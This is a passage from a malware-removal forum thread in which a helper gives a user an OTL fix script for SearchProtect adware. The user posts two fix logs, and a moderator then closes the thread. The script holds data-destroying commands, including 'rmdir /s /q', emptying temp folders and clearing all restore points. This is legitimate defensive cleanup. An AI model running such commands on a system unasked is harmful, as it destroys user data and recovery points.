========== LOP Check ==========
 
[2014/03/15 21:45:16 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Audacity
[2013/10/01 23:14:48 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG
[2011/03/26 12:34:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG10
[2013/12/20 22:13:01 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2014/02/05 22:05:33 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.elance.tracker
[2013/12/03 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Dropbox
[2014/03/28 16:06:38 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\FileZilla
[2013/10/01 13:51:37 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GitHub
[2013/10/01 20:54:09 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GoodSync
[2011/04/08 21:25:07 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Inspyder Sitemap Creator
[2013/04/25 23:37:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\MySQL
[2013/10/01 21:04:11 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Nico Mak Computing
[2013/04/26 13:39:49 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Notepad++
[2012/06/01 16:33:17 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\OpenOffice.org
[2013/03/25 10:56:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Opera
[2013/05/23 13:20:58 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\StageManager.BD092818F67280F4B42B04877600987F0111B594.1
[2012/07/21 11:10:40 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Subversion
[2012/09/06 07:02:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Tatara Systems
[2012/06/01 00:40:19 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Template
[2013/04/28 15:15:47 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\TuneUp Software
[2012/07/22 22:28:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\UBot Studio
[2014/02/18 10:20:56 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\WinFF
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default\AppData\Roaming\TuneUp Software
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default User\AppData\Roaming\TuneUp Software
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 120 bytes -> C:\ProgramData\TEMP:D5AD7675
 
< End of report >
 
 
Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Run OTL

  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :OTL

    FF - prefs.js..browser.search.defaultenginename,: ""

    FF - prefs.js..browser.search.order.1: ""

    FF - prefs.js..browser.search.order.1,: ""

    FF - prefs.js..browser.search.selectedEngine,: ""

    FF - prefs.js..keyword.URL: ""

    O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

    O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

    :files

    ipconfig /flushdns /c

    :Commands

    [emptytemp]

    [clearallrestorepoints]

  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Please post the OTL fix log in your next reply.
Note: A copy of an OTL fix log is saved in a text file at C:\_OTL\MovedFiles
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Still present:

 

All processes killed
Error: Unable to interpret <------------ QUOTE ----------> in the current context!
========== OTL ==========
Prefs.js: "" removed from browser.search.defaultenginename,
Prefs.js: "" removed from browser.search.order.1
Prefs.js: "" removed from browser.search.order.1,
Prefs.js: "" removed from browser.search.selectedEngine,
Prefs.js: "" removed from keyword.URL
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir deleted successfully.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 888375 bytes
->Temporary Internet Files folder emptied: 2415824 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 384326841 bytes
->Apple Safari cache emptied: 0 bytes
->Opera cache emptied: 0 bytes
->Flash cache emptied: 405 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 7490 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 270628325 bytes
 
Total Files Cleaned = 628.00 mb
 
Restore point Set: OTL Restore Point
Error: Unable to interpret <-----------------------------> in the current context!
 
OTL by OldTimer - Version 3.2.69.0 log created on 03292014_182647
 
Files\Folders moved on Reboot...
File move failed. C:\Windows\temp\ib2 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib3 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib4 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib5 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib6 scheduled to be moved on reboot.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...
Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

This script is not worked, because when you mark this script the word Quote is there too. You script in OTL should looks like this:

:OTL

FF - prefs.js..browser.search.defaultenginename,: ""

FF - prefs.js..browser.search.order.1: ""

FF - prefs.js..browser.search.order.1,: ""

FF - prefs.js..browser.search.selectedEngine,: ""

FF - prefs.js..keyword.URL: ""

O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

:files

ipconfig /flushdns /c

:Commands

[emptytemp]

[clearallrestorepoints]

Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Ok, ive tried that again. Its still installed:

 

All processes killed
========== OTL ==========
Prefs.js: "" removed from browser.search.defaultenginename,
Prefs.js: "" removed from browser.search.order.1
Prefs.js: "" removed from browser.search.order.1,
Prefs.js: "" removed from browser.search.selectedEngine,
Prefs.js: "" removed from keyword.URL
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 371531 bytes
->Temporary Internet Files folder emptied: 2368526 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 247717444 bytes
->Apple Safari cache emptied: 0 bytes
->Opera cache emptied: 0 bytes
->Flash cache emptied: 639 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1254 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 0 bytes
 
Total Files Cleaned = 239.00 mb
 
Restore point Set: OTL Restore Point
 
OTL by OldTimer - Version 3.2.69.0 log created on 03302014_121153
 
Files\Folders moved on Reboot...
File move failed. C:\Windows\temp\ib2 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib3 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib4 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib5 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib6 scheduled to be moved on reboot.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...
Link to post
Share on other sites
  • Root Admin
AdvancedSetup

AdvancedSetup

Posted
  • Root Admin
Posted

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.